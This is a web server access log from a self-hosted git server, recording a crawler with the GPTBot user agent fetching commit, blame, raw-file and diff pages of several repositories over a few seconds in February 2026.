"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10163] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" -[17/Feb/2026:14:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11405] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" -[17/Feb/2026:14:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" -[17/Feb/2026:14:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 626385] [Gzip 15.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10250] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322670] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:14:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls" [Client 74.7.227.38] [Length 9933] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode" -[17/Feb/2026:14:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25625] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25620] [Gzip 11.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10285] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10281] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10471] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10822] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/stars" [Client 74.7.227.38] [Length 7382] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:14:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:14:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 74.7.227.38] [Length 11843] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:14:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11356] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" -[17/Feb/2026:14:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11356] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" -[17/Feb/2026:14:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 21529] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:14:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 21497] [Gzip 6.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:14:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10995] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10477] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10831] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 74.7.227.38] [Length 23744] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" -[17/Feb/2026:14:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html?display=rendered" [Client 74.7.227.38] [Length 14168] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" -[17/Feb/2026:14:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 115833] [Gzip 13.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:14:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 16173] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:14:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10420] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10421] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" -[17/Feb/2026:14:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" -[17/Feb/2026:14:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 115841] [Gzip 13.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:14:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 51955] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:14:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 115918] [Gzip 13.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:14:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 212458] [Gzip 13.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:14:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 115886] [Gzip 13.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:14:24:29 +0000] - 200 200 - GET https 